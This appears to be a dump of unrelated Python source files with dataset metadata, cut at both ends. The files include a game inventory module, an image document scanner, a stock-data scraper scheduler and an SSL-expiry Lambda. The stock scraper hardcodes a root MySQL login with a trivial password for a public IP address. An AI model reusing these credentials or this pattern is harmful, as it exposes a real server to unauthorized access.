self.location.replace('location=', '')\n print(\"bus location = \" + self.location)\n if 'stdout' in sys.argv[i]:\n self.stdout = sys.argv[i]\n self.stdout = self.stdout.replace('stdout=', '')\n print(\"stdout = \" + self.stdout)\n sys.stdout=open(self.stdout, \"a\")\n if 'usage' in sys.argv[i]:\n show_usage()\n sys.exit(0)\n if len(vid) != 0 and len(pid) != 0:\n vidpid_string(vid, pid)\n else:\n if len(vid) != 0:\n sys.stdout.write(\"pid is not appointed! \\n\")\n sys.stdout.flush()\n show_usage()\n sys.exit(-1)\n if len(pid) != 0:\n sys.stdout.write(\"vid is not appointed! \\n\")\n sys.stdout.flush()\n show_usage()\n sys.exit(-1)\n\n def __init__(self):\n self.device = 0\n self.dev_backend = 0\n self.epOut = 0\n self.epIn = 0\n self.data = array('B')\n self.ser_cmd = array('B')\n self.ioTime = 0\n self.emmc_timeout = 0\n self.python_version = 3\n self.location = None\n self.stdout = None\n if sys.version_info[0] < 3:\n self.python_version = 2;\n","sub_path":"install/soc_bm1880_asic_edb/bm1880_emmc_dl_v1p1/bm_usb_util/bm_usb_libusb.py","file_name":"bm_usb_libusb.py","file_ext":"py","file_size_in_byte":20762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"229333398","text":"from datetime import date\nanoN = int(input('Digite seu ano de nascimento: '))\nidade = date.today().year - anoN\nprint('Quem nasceu em {} tem {} anos em {}'.format(anoN, idade, date.today().year))\nif idade == 18:\n print('ALISTE-SE AGORA')\nelif idade < 18:\n print('Faltam {} anos para o seu alistamento obrigatorio!'.format(18 - idade))\nelif idade > 18:\n print('Seu alistamento foi em {}'.format(date.today().year-(idade-18)))\n\n","sub_path":"CursoemVideo/desafio39.py","file_name":"desafio39.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"76960196","text":"import os\nos.environ['DJANGO_SETTINGS_MODULE'] = 'settings'\nfrom django.db.models.loading import cache as model_cache\nif not model_cache.loaded:\n model_cache.get_models()\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template\nfrom django.template import Context, Template\nfrom django.shortcuts import render,RequestContext\nfrom django.http import HttpResponse\nfrom pages.models import Page,Categorie_Page,Template\nfrom moteur.models import Film\nfrom scripts_django.tools import recursif_template\nimport settings\n\n\nb = Page(Nom=\"ImageActeur_Modele\")\nb.save()\nb = Page(Nom=\"Acteur_Modele\")\nb.save()\nb = Page(Nom=\"ImageFilm_Modele\")\nb.save()\nb = Page(Nom=\"Film_Modele\")\nb.save()\nb = Page(Nom=\"ImageVente_Modele\")\nb.save()\nb = Page(Nom=\"Pack_Modele\")\nb.save()\nb = Page(Nom=\"ImageVideo_Modele\")\nb.save()\nb = Page(Nom=\"Pack_Modele\")\nb.save()\nb = Template(Nom=\"index\",contenu=\"\"\"\n\n
\n
\n{% include titi %}\n\n\"\"\")\nb.save()\nb = Template(Nom=\"titi\",contenu=\"\"\"titi\n{% include toto %}\"\"\")\nb.save()\nb = Template(Nom=\"toto\",contenu=\"\"\"toto\"\"\")\nb.save()\nb = Page(Nom=\"index\",Template=Template.objects.get(\"index\"))\nb.save()\n","sub_path":"old/danakold2/Initialisation.py","file_name":"Initialisation.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"357962155","text":"# -*- coding: utf-8 -*-\nimport traceback\n\nfrom BagConfig import BagConfig\nfrom itemsConfig import itemsIndex\nfrom KBEDebug import *\n__author__ = 'chongxin'\n__createTime__ = '2016年12月26日'\n\"\"\"\n背包模块\n\"\"\"\nclass BagModule:\n\n\n def onEntitiesEnabled(self):\n # 加载宝石\n self.loadDiamonds()\n # 加载装备\n self.loadEquips()\n # 加载礼包\n self.loadGifts()\n # 加载材料\n self.loadMaterial()\n # 加载碎片\n self.loadPiecesItem()\n # 加载消耗品\n self.loadUse()\n pass\n\n # --------------------------------------------------------------------------------------------\n # 客户端调用函数\n # --------------------------------------------------------------------------------------------\n # 客户端请求背包列表\n def onClientGetItemList(self):\n retItems = []\n for uuid in self.bagUUIDList:\n _,item = self.getItemByUUID(uuid)\n if item is None:\n continue\n value = {}\n value[\"UUID\"] = uuid\n value[\"itemID\"] = item[\"itemID\"]\n value[\"amount\"] = item[\"amount\"]\n retItems.append(value)\n\n ERROR_MSG(\"onClientGetItemList\")\n self.client.onGetItemList(retItems)\n\n\n # 批量出售\n def onClientSellBatch(self,uuidList):\n for uuid in uuidList:\n # 获得装备\n ERROR_MSG(\"-------------------uuid is ---------\" +str(uuid))\n _,item = self.getItemByUUID(uuid)\n if item != None:\n # 获得数量\n ERROR_MSG(\"------------UUID ----------------\" + str(uuid) + \" price \" + str( itemsIndex[item[\"itemID\"]][\"price\"]))\n amount = item[\"amount\"]\n self.onClientSellOne(uuid,amount)\n\n\n # 出售一个\n def onClientSellOne(self,uuid,num):\n\n itemType,item = self.getItemByUUID(uuid)\n\n if item is None:\n return\n ammount = item[\"amount\"]\n\n if num > ammount:\n return\n\n # 获得装备ID\n itemId = item[\"itemID\"]\n # 获得单价\n price = itemsIndex[itemId][\"price\"]\n\n sellMoney = self.euro + num * price\n\n result = False\n if itemType == ItemTypeEnum.Diamond:\n self.decDiamond(uuid,num)\n elif itemType == ItemTypeEnum.Equips:\n self.decEquip(uuid,num)\n elif itemType == ItemTypeEnum.Gift:\n self.decGift(uuid,num)\n elif itemType == ItemTypeEnum.Use:\n self.decUse(uuid,num)\n elif itemType == ItemTypeEnum.Pieces:\n self.decPieces(uuid,num)\n elif itemType == ItemTypeEnum.Material:\n self.decMaterial(uuid,num)\n\n # if result is True:\n self.euro = sellMoney\n ERROR_MSG(\"------------itemID ----------------\" + str(itemId) + \" price \"+ str(price))\n\n # 扩容\n def onClientBuyBagSize(self,count):\n needDiamond = count * BagConfig[1][\"bagPrice\"]\n\n if self.diamond >= needDiamond:\n self.diamond = self.diamond - needDiamond\n self.bagSize = self.bagSize + count\n\n\n\n\n\n\n # --------------------------------------------------------------------------------------------\n # 工具函数调用函数\n # --------------------------------------------------------------------------------------------\n\n def getItemByUUID(self,uuid):\n itemType = ItemTypeEnum.Wrong\n item = None\n\n if uuid not in self.bagUUIDList:\n return itemType,item\n\n if uuid in self.equipsContainer:\n item = self.equipsContainer[uuid]\n itemType = ItemTypeEnum.Equips\n elif uuid in self.useContainer:\n item = self.useContainer[uuid]\n itemType = ItemTypeEnum.Use\n elif uuid in self.materialContainer:\n item = self.materialContainer[uuid]\n itemType = ItemTypeEnum.Material\n elif uuid in self.diamondsContainer:\n item = self.diamondsContainer[uuid]\n itemType = ItemTypeEnum.Diamond\n elif uuid in self.piecesContainer:\n item = self.piecesContainer[uuid]\n itemType = ItemTypeEnum.Pieces\n elif uuid in self.giftContainer:\n item = self.giftContainer[uuid]\n itemType = ItemTypeEnum.Gift\n\n return itemType,item\n\n # 加一个道具到背包,并分发到各个容器\n def putItemInBag(self,itemID,num):\n itemID = int(itemID)\n if itemID not in itemsIndex:\n return\n\n\n itemIndex = itemsIndex[itemID]\n itemType = itemIndex[\"itemsType\"]\n\n # 检查背包大小\n isTogether = itemIndex[\"isTogether\"]\n\n needBagSize = 1\n if isTogether <= 0:\n needBagSize = num\n\n if len(self.bagUUIDList)+ needBagSize > self.bagSize:\n ERROR_MSG(\"putItemInBag itemId \"+str(itemID)+\" len \" + str(len(self.bagUUIDList)) + \" needBagSize \" + str(needBagSize) + \" bagSize \" + str(self.bagSize))\n return\n\n if itemType == ItemTypeEnum.Equips:\n self.addEquipByItemID(itemID,num)\n elif itemType == ItemTypeEnum.Use:\n self.addUse(itemID,num)\n elif itemType == ItemTypeEnum.Material:\n self.addMaterial(itemID,num)\n elif itemType == ItemTypeEnum.Diamond:\n self.addDiamond(itemID,num)\n elif itemType == ItemTypeEnum.Pieces:\n self.addPieces(itemID,num)\n elif itemType == ItemTypeEnum.Gift:\n self.addGift(itemID,num)\n\n # 根据itemID获得数量\n def getItemNumByItemID(self,itemID):\n count = 0\n for uuid in self.bagUUIDList:\n _, item = self.getItemByUUID(uuid)\n if item is None:\n continue\n if item[\"itemID\"] == int(itemID):\n count = count + item[\"amount\"]\n\n return count\n\n # 删除物品\n def decItem(self,itemID,num):\n itemID = int(itemID)\n itemIndex = itemsIndex[itemID]\n itemType = itemIndex[\"itemsType\"]\n ERROR_MSG(\" decItem itemID \" + str(itemID) +\" itemType \" + str(itemType) + \" num \" + str(num))\n\n decCount = num\n\n for uuid in self.bagUUIDList:\n _, item = self.getItemByUUID(uuid)\n if item is None:\n continue\n\n if decCount <= 0:\n break\n if item[\"itemID\"] == itemID:\n result = False\n amount = item[\"amount\"]\n if amount < decCount:\n num = amount\n\n\n ERROR_MSG(\" itemID is \"+ str(itemID) +\" amount \"+ str(item[\"amount\"]))\n if itemType == ItemTypeEnum.Diamond:\n result = self.decDiamond(uuid, num)\n elif itemType == ItemTypeEnum.Equips:\n result = self.decEquip(uuid, num)\n elif itemType == ItemTypeEnum.Gift:\n result = self.decGift(uuid, num)\n elif itemType == ItemTypeEnum.Use:\n result = self.decUse(uuid, num)\n elif itemType == ItemTypeEnum.Pieces:\n result = self.decPieces(uuid, num)\n elif itemType == ItemTypeEnum.Material:\n result = self.decMaterial(uuid, num)\n\n decCount = decCount - amount\n\n # if result is True:\n # ERROR_MSG(\"bagModule result is True\")\n # value = {}\n # value[\"UUID\"] = uuid\n # value[\"itemID\"] = itemID\n # value[\"amount\"] = item[\"amount\"] - num\n # self.client.onGetItemInfo(value)\n # else:\n # ERROR_MSG(\"bagModule result is False\")\n # return result\n return False\n\n def noticeClientBagUpdate(self,uuid,itemId,num):\n if uuid not in self.bagUUIDList:\n if num != 0:\n self.bagUUIDList.append(uuid)\n else:\n ERROR_MSG(\"--------exec Error check now!!! -----------\")\n traceback.print_stack()\n value = {}\n value[\"UUID\"] = uuid\n value[\"itemID\"] = int(itemId)\n value[\"amount\"] = num\n self.client.onGetItemInfo(value)\n\n if num <= 0:\n self.bagUUIDList.remove(uuid)\n\nclass ItemOrderBy:\n byItemType = 1\n byQualityOrder = 2\n\nclass ItemTypeEnum:\n\n # 错误类型\n Wrong = 1000\n\n Equips = 1001\n # 消耗品\n Use = 1002\n # 宝石\n Diamond = 1003\n # 礼包\n Gift = 1004\n # 材料\n Material = 1005\n # 球员碎片\n Pieces = 1006\n\n\n\n\n\n\n\n\n\n # 装备\n\nif __name__ == \"__main__\":\n print(__file__)\n pass\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"scripts/base/part/BagModule.py","file_name":"BagModule.py","file_ext":"py","file_size_in_byte":8837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"27966518","text":"from controller.Neo4jController import Neo4jController\nfrom controller.Controller import Controller, Tags\nfrom servers.neo4j_server.Neo4jServer import Neo4jServer\n\nmenu_list = {\n 'Neo4j menu': {\n 'Messages with tags': Neo4jController.get_users_with_tagged_messages,\n 'N-long mutuals': Neo4jController.get_users_with_n_long_relations,\n 'Shortest way between users': Neo4jController.shortest_way_between_users,\n 'Spam conversations': Neo4jController.get_users_wicth_have_only_spam_conversation,\n 'Unrelated users with tags': Neo4jController.get_unrelated_users_with_tagged_messages,\n 'Exit': Controller.stop_loop,\n }\n}\n\nroles = {\n 'utilizer': 'Utilizer menu',\n 'admin': 'Admin menu'\n}\n\nneo4j = Neo4jServer()\nspecial_parameters = {\n 'role': '(admin or utilizer)',\n 'tags': '('+', '.join(x.name for x in list(Tags))+')(Enter comma-separated values)',\n 'username1': '(' + ', '.join(x for x in neo4j.get_users()) + ')',\n 'username2': '(' + ', '.join(x for x in neo4j.get_users()) + ')'\n}\n","sub_path":"lab3/src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"483012908","text":"from skimage.filters import threshold_local\nimport numpy as np\nimport argparse\nimport cv2\nimport imutils\nimport urllib\nfrom PIL import Image\nfrom PIL import ImageEnhance\nimport boto3\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\",\"--image\", required = True)\nargs = vars(ap.parse_args())\n#image = cv2.imread(args[\"image\"])\nurl_response = urllib.request.urlopen(args[\"image\"])\nimg_array = np.array(bytearray(url_response.read()), dtype=np.uint8)\nimage = cv2.imdecode(img_array, -1)\n\ndef order_points(pts):\n rect = np.zeros((4, 2), dtype = \"float32\")\n s = pts.sum(axis = 1)\n rect[0] = pts[np.argmin(s)]\n rect[2] = pts[np.argmax(s)]\n diff = np.diff(pts, axis = 1)\n rect[1] = pts[np.argmin(diff)]\n rect[3] = pts[np.argmax(diff)]\n return rect\n\ndef clahe(img, clip_limit=2.0, grid_size=(8,8)):\n clahe = cv2.createCLAHE(clipLimit=clip_limit, tileGridSize=grid_size)\n return clahe.apply(img)\n\ndef mask(image):\n src = image\n orig = src.copy()\n hsv = cv2.cvtColor(src.copy(), cv2.COLOR_BGR2HSV)\n lower_blue = np.array([0, 0, 120])\n upper_blue = np.array([180, 38, 255])\n mask = cv2.inRange(hsv, lower_blue, upper_blue)\n result = cv2.bitwise_and(src, src, mask=mask)\n b, g, r = cv2.split(result)\n g = clahe(g, 5, (3, 3))\n\n\n img_blur = cv2.blur(g, (9, 9))\n img_th = cv2.adaptiveThreshold(img_blur, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY, 51, 2)\n\n contours, hierarchy = cv2.findContours(img_th,cv2.RETR_CCOMP,cv2.CHAIN_APPROX_SIMPLE)\n max_brightness = 0\n canvas = src.copy()\n for cnt in contours:\n rect = cv2.boundingRect(cnt)\n x, y, w, h = rect\n if w*h > 40000:\n mask = np.zeros(src.shape, np.uint8)\n mask[y:y+h, x:x+w] = src[y:y+h, x:x+w]\n brightness = np.sum(mask)\n if brightness > max_brightness:\n brightest_rectangle = rect\n max_brightness = brightness\n print(rect)\n break\n\n x, y, w, h = brightest_rectangle\n cv2.rectangle(canvas, (x, y), (x+w, y+h), (0, 255, 0), 1)\n cv2.imwrite('maskedimg.jpg',mask)\n gray = cv2.cvtColor(mask,cv2.COLOR_BGR2GRAY)\n _,thresh = cv2.threshold(gray,1,255,cv2.THRESH_BINARY)\n contours,hierarchy = cv2.findContours(thresh,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n cnt = contours[0]\n x,y,w,h = cv2.boundingRect(cnt)\n crop = image[y:y+h,x:x+w]\n print(cnt)\n cv2.imwrite('croppedimg.jpg',crop)\n cropped=Image.open('croppedimg.jpg')\n enhance_img(cropped);\n\n\ndef enhance_img(image1):\n print('Step 5. Enhance')\n enh_bri = ImageEnhance.Brightness(image1)\n brightness = 1.2\n image_brightened = enh_bri.enhance(brightness)\n\n image1 = image_brightened\n enh_col = ImageEnhance.Color(image1)\n color = 1.6\n image_colored = enh_col.enhance(color)\n\n image1 = image_colored\n enh_con = ImageEnhance.Contrast(image1)\n contrast = 2\n image_contrasted = enh_con.enhance(contrast)\n\n image1 = image_contrasted\n enh_sha = ImageEnhance.Sharpness(image1)\n sharpness = 1.3\n image_sharped = enh_sha.enhance(sharpness)\n image_sharped.save(\"output/demo_output.jpg\")\n\n #client = boto3.client('s3', region_name='ap-south-1')\n #client.upload_file('/var/www/html/python/' + 'demo_output.jpg', 'dockboyz', 'uploads/after/{}'.format('demo_output.jpg'))\n\ndef four_point_transform(image, pts):\n rect = order_points(pts)\n (tl, tr, br, bl) = rect\n widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n maxWidth = max(int(widthA), int(widthB))\n\n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n maxHeight = max(int(heightA), int(heightB))\n\n dst = np.array([\n [0, 0],\n [maxWidth - 1, 0],\n [maxWidth - 1, maxHeight - 1],\n [0, maxHeight - 1]], dtype = \"float32\")\n \n\n M = cv2.getPerspectiveTransform(rect, dst)\n warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n \n\n return warped, maxHeight*maxWidth\n\ndef blurrchecker(image):\n return cv2.Laplacian(image,cv2.CV_64F).var()\n\n#image = cv2.imread('paper23.png')\n\nprint(\"Step 1. Check blur score\")\nif (blurrchecker(image) < 80.0):\n print(\"Please re-take the image\")\n print(blurrchecker(image))\nelse:\n print(blurrchecker(image))\n ratio = image.shape[0]/500.0\n orig = image.copy()\n image= imutils.resize(image,height = 500)\n gray = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\n retval,threshold = cv2.threshold(image,30,255,cv2.THRESH_BINARY)\n kernel = np.ones((5,5),np.uint8)\n\n grey = cv2.GaussianBlur(image,(5,5),0)\n print(\"step 2. Edge Detection\")\n edged = cv2.Canny(grey,75,200)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n print(\"step 3. Find contours\")\n cnts = cv2.findContours(edged.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n \n cnts = imutils.grab_contours(cnts)\n cnts = sorted(cnts,key = cv2.contourArea,reverse = True)[:5]\n\n idx = 0\n for c in cnts:\n peri = cv2.arcLength(c,True)\n\n approx = cv2.approxPolyDP(c,0.02 *peri,True)\n x,y,w,h = cv2.boundingRect(c)\n if w > 50 and h > 50:\n idx += 1\n new = image[y:y+h,x:x+w]\n\n\n if len(approx) == 4:\n screenCnt = approx\n break\n if len(approx) != 4:\n print(\"Step 4. Mask\")\n mask(orig);\n exit();\n\n cv2.drawContours(image,[screenCnt],-1,(0,255,0),2)\n\n\n \n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n print('Step 4. Perspective Transform')\n warped,a = four_point_transform(orig,screenCnt.reshape(4,2) *ratio)\n\n if len(approx) ==4 and a<40000:\n mask(orig);\n exit();\n\n warped_new = imutils.resize(warped,height = 500)\n\n cv2.imwrite('newscanned.jpg',warped_new)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n cropped=Image.open('newscanned.jpg')\n enhance_img(cropped);","sub_path":"Final6.py","file_name":"Final6.py","file_ext":"py","file_size_in_byte":5997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"110380300","text":"import unittest\nimport pickle\nimport numpy as np\nimport time\nimport os\n\nfrom PIL import Image\nfrom unittest.mock import Mock\n\nfrom core.preprocessing.wrappers.rgb2gray import RGB2Gray\n\n\nclass TestRGB2Gray(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls) -> None:\n cls.env = Mock()\n cls.wrapper = RGB2Gray(cls.env)\n\n current_directory = os.path.dirname(os.path.abspath(__file__))\n\n with open(os.path.join(current_directory, \"data\", \"_original_images.pkl\"), \"rb\") as file:\n cls.images = pickle.load(file)['rgb']\n\n with open(os.path.join(current_directory, \"data\", \"_original_images_black.pkl\"), \"rb\") as file:\n cls.image_processed = pickle.load(file)\n\n def test_process(self):\n black = self.wrapper.process(self.images)\n image = np.reshape(black, newshape=(64 * 3, 64 * 4))\n self.assertEqual(True, np.array_equal(self.image_processed, image), \"Processed image is not the same as stored\")\n\n def _show_saved_image(self):\n \"\"\" Not a test method, but created for when a user wants to see input/output. \"\"\"\n image = np.reshape(self.images, newshape=(64 * 3, 64 * 4, 3))\n self._show_image(image, wait_time=3)\n\n @staticmethod\n def _show_image(image, wait_time):\n \"\"\" Helper to depict an image for a wait time number of seconds. \"\"\"\n img = Image.fromarray(image)\n img.show()\n time.sleep(wait_time)\n img.close()\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/preprocessing/wrappers/test_rgb2gray.py","file_name":"test_rgb2gray.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"579648488","text":"import numpy as np\n\n# A DP program to solve edit distance problem\ndef editDistDP(x, y):\n m = len(x);\n n = len(y);\n # Create an e-table to store results of subproblems\n e = np.zeros((m+1, n+1), dtype=int)\n\n # Fill in e[][] in bottom up manner\n for i in range(m + 1):\n for j in range(n + 1):\n # Initialization\n if i == 0:\n e[i][j] = j\n elif j == 0:\n e[i][j] = i\n elif x[i-1] == y[j-1]:\n e[i][j] = min(1 + e[i-1][j], 1 + e[i][j-1], e[i-1][j-1])\n else:\n e[i][j] = 1 + min(e[i-1][j], e[i][j-1], e[i-1][j-1])\n\n # return e[m][n]\n return e\n\n# Test case 1\n# x = \"snowy\"\n# y = \"sunny\"\n\n# Test case 2\nx = \"heroically\"\ny = \"scholarly\"\n\nprint(editDistDP(x, y))\n","sub_path":"Discussion7/ed_numpy.py","file_name":"ed_numpy.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"196308771","text":"def get_setting():\n res = []\n try:\n with open(\"123.txt\") as f:\n slist = f.readlines()\n print(\"讀入 :\",slist)\n for lst in slist:\n s = lst.split(\",\")\n #Python strip()方法用於移除字符串頭尾指定的字符(默認為空格或換行符)或字符序列。\n res.append([s[0].strip(),float(s[1]),float(s[2])])\n except:\n print(\"讀取錯誤\")\n return res\n\nstock = get_setting()\nprint(stock)","sub_path":"python practice/Line股票實作/6-0.py","file_name":"6-0.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"14282792","text":"# -*- coding: utf-8 -*-\n\"\"\"\n------------------------------------------------- \nFile Name: 6.4self讲解 \nDescription : \nAuthor : ml \ndate: 2018/7/13\n------------------------------------------------- \nChange Activity: \n\t\t\t\t2018/7/13:\n-------------------------------------------------\n\"\"\"\n__author__ = 'ml'\n'''\npython解释器会把这个对象作为第一个参数传递给self,所以开发者只需要传递后面的参数即可\n类中的方法代码块不存放到内存中,减少内存的使用,有个指向类的地址来找方法\n'''\nclass Dog:\n def __init__(self,color):\n self.color = color\n def printColor(self):\n print(\"color:%s\"%self.color)\nwangcai = Dog(\"白\")\nwangcai.printColor()\n\nxiaohei = Dog(\"黑\")\nxiaohei.printColor()","sub_path":"python_basic/6.面向对象1/6.4self讲解.py","file_name":"6.4self讲解.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"39970554","text":"\nfrom onespiderstock import *\nfrom dapan_gegu import *\nfrom spider_holders import *\nfrom yejiyubao import *\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\n\nimport pymysql\n\n\nconn = pymysql.Connect(host='47.105.106.111', port=3306, user='root', password='123456', db='stock',\n charset='utf8')\ncs1 = conn.cursor()\n\ndef del_table(): #清空各表数据\n delete_merge_stock_stock = 'truncate merge_stock'\n delete_one_stock = 'truncate one_spider_stock'\n delete_spiderstock = 'truncate spiderstock'\n delete_gegu_shanghai_stock = 'truncate ge_gu_shanghai'\n delete_gegu_shenzhen_stock = 'truncate ge_gu_shenzhen'\n delete_gegu_chuangyeban_stock = 'truncate ge_gu_chuangyeban'\n delete_gegu_zhongxiaoban_stock = 'truncate ge_gu_zhongxiaoban'\n return delete_one_stock,delete_spiderstock,delete_merge_stock_stock,delete_gegu_shanghai_stock,delete_gegu_shenzhen_stock,delete_gegu_chuangyeban_stock,delete_gegu_zhongxiaoban_stock\n\ndef del_text():\n \"\"\"清空数据\"\"\"\n print('清空各表数据')\n delete_t = del_table()\n for i in delete_t:\n cs1.execute(i)\n print('清空完成!开始爬取')\n\n\ndef start_gegu():\n \"\"\"爬取大盘及个股数据\"\"\"\n #单条数据大盘\n one_shanghai()\n one_shenzhen()\n one_zhongxiaoban()\n one_chuangyeban()\n #各股数据\n shanghai_gegu()\n shenzhen_gegu()\n zhongxiaoban_gegu()\n chuangyeban_gegu()\n\ndef over_stock():\n\n print('当天内数据筛选并爬取完毕...')\n print('释放数据库资源...')\n conn.close() #\n\n\nif __name__ == '__main__':\n \"\"\"启动爬虫\"\"\"\n\n # sched = BlockingScheduler()\n # yejiyubao_stock()\n\n spiderholders()\n\n #定时 三点整清空各表数据\n\t#sched.add_job(del_text,trigger='cron',day_of_week='0-4',hour=16, minute=32)\n\n # 定时三点10分爬取各股数据\n\t#sched.add_job(start_gegu,trigger='cron',day_of_week='0-4',hour=16, minute=43)\n # sched.add_job(over_stock, trigger='cron', day_of_week='0-4', hour=15, minute=59)\n \n #业绩预报\n # sched.add_job(yejiyubao_stock, trigger='cron', day_of_week='0-4', hour=10, minute=39)\n #股东人数\n # sched.add_job(spiderholders,trigger='cron',day_of_week='0-4',hour=19, minute=30)\n #释放数据库\n # sched.add_job(over_stock,trigger='cron',day_of_week='0-4',hour=21, minute=00)\n\n # sched.start()\n\n\n\n","sub_path":"股票爬取/spider_main.py","file_name":"spider_main.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"102062147","text":"\nimport socket\nimport ssl\nimport json\nimport re,sys,os,datetime\nfrom botocore.vendored import requests\n\ndef ssl_expiry_date(domainname):\n ssl_date_fmt = r'%b %d %H:%M:%S %Y %Z'\n context = ssl.create_default_context()\n conn = context.wrap_socket(\n socket.socket(socket.AF_INET),\n server_hostname=domainname,\n )\n # 3 second timeout because Lambda has runtime limitations\n conn.settimeout(3.0)\n conn.connect((domainname, 443))\n ssl_info = conn.getpeercert()\n return datetime.datetime.strptime(ssl_info['notAfter'], ssl_date_fmt).date()\n\ndef slack(alert, expires, days):\n data = {\n \"username\": \"Cert Bot\",\n \"icon_emoji\": \":shield:\",\n \"text\": os.environ['CHECK_URL'] + \" SSL Certificate Due To Expire\",\n \"attachments\": [\n {\n \"color\": \"#c0392b\" if alert else '#d35400',\n \"fields\": [\n {\n \"title\": \"Expiry Date\",\n \"value\": expires.strftime('%A %B %-d %Y at %H:%M:%S'),\n \"short\": \"true\"\n },\n {\n \"title\": \"Days Remaining\",\n \"value\": days,\n \"short\": \"true\"\n }\n ]\n }\n ]\n }\n\n post_data = json.dumps(data).encode('utf-8')\n\n req = requests.post(os.environ['SLACK_URL'], post_data)\n\n print(req.status_code, req.reason)\n\n#####Main Section\ndef handler(event, context):\n expires = ssl_expiry_date(os.environ['CHECK_URL'])\n remains = int((expires - datetime.datetime.utcnow().date()).days)\n\n print('Expires: ', expires)\n print('Remains: ', remains)\n\n if remains <= int(os.environ['ALERT_DAYS']):\n slack(True, expires, remains)\n elif remains <= int(os.environ['WARN_DAYS']):\n slack(False, expires, remains)","sub_path":"lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"22531994","text":"#!/usr/bin/env python3\n\"\"\"\nDEV NOTE:\nThis is becoming difficult to maintain and could use a complete rewrite. The 'miseqsim' flag was added as an\nafterthought, though has now become the main focus of this script. Ultimately, navigating around BaseMount is going to\nbe messy, but this could still be much cleaner.\n\nIt might also be worth transitioning to the V2 API (basemount --use-v2-api).\n\"\"\"\n\nimport os\nimport click\nimport shutil\nimport logging\nimport pandas as pd\nfrom pathlib import Path\nfrom BaseMountRetrieve.__init__ import __version__, __author__, __email__\n\nscript = os.path.basename(__file__)\nlogger = logging.getLogger()\nlogging.basicConfig(\n format=f'\\033[92m \\033[1m {script}:\\033[0m %(message)s ',\n level=logging.INFO)\n\n\ndef print_version(ctx, param, value):\n if not value or ctx.resilient_parsing:\n return\n logging.info(f\"Version: {__version__}\")\n logging.info(f\"Author: {__author__}\")\n logging.info(f\"Email: {__email__}\")\n quit()\n\n\ndef convert_to_path(ctx, param, value):\n if not value or ctx.resilient_parsing:\n return\n return Path(value)\n\n\n@click.command()\n@click.option('-p', '--projectdir',\n type=click.Path(exists=True),\n required=False,\n default=None,\n help='Path to the directory on BaseMount for a particular project. e.g. '\n 'basemount/Projects/[your project].',\n callback=convert_to_path)\n@click.option('-o', '--outdir',\n type=click.Path(exists=False),\n required=True,\n default=None,\n help='Directory to dump all .fastq.gz files. Note that the Sample ID will be appended to the beginning '\n 'of the copied .fastq.gz file, which normally only contains the Sample Name.',\n callback=convert_to_path)\n@click.option('-m', '--miseqsim',\n help='Specify this flag to simulate the MiSeq folder structure when retrieving from BaseSpace',\n is_flag=True,\n default=False)\n@click.option('-v', '--verbose',\n help='Specify this flag to enable more verbose output.',\n is_flag=True,\n default=False)\n@click.option('--version',\n help='Specify this flag to print the version and exit.',\n is_flag=True,\n is_eager=True,\n callback=print_version,\n expose_value=False)\ndef cli(projectdir, outdir, miseqsim, verbose):\n logging.info(f\"Started BaseMountRetrieve (v{__version__})\")\n\n if verbose:\n logging.getLogger().setLevel(logging.DEBUG)\n logging.debug(\"Enabled VERBOSE mode\")\n\n # Create output directory if it doesn't already exist\n os.makedirs(outdir, exist_ok=True)\n\n # Get samplesheets\n samplesheet_dict = {}\n run_translation_dict = {}\n if miseqsim:\n samplesheet_dict, run_translation_dict = retrieve_run_files(projectdir=projectdir, outdir=outdir)\n\n # Get list of samples to transfer, download files\n retrieve_samples(projectdir=projectdir, outdir=outdir, miseqsim=miseqsim)\n\n # Move everything around to simulate MiSeq folder structure\n if miseqsim:\n logfile_dict = retrieve_logfile_dict(projectdir)\n sample_dict = get_sample_dictionary(outdir)\n\n logging.debug(\"SAMPLE DICTIONARY:\")\n for sample_id, reads in 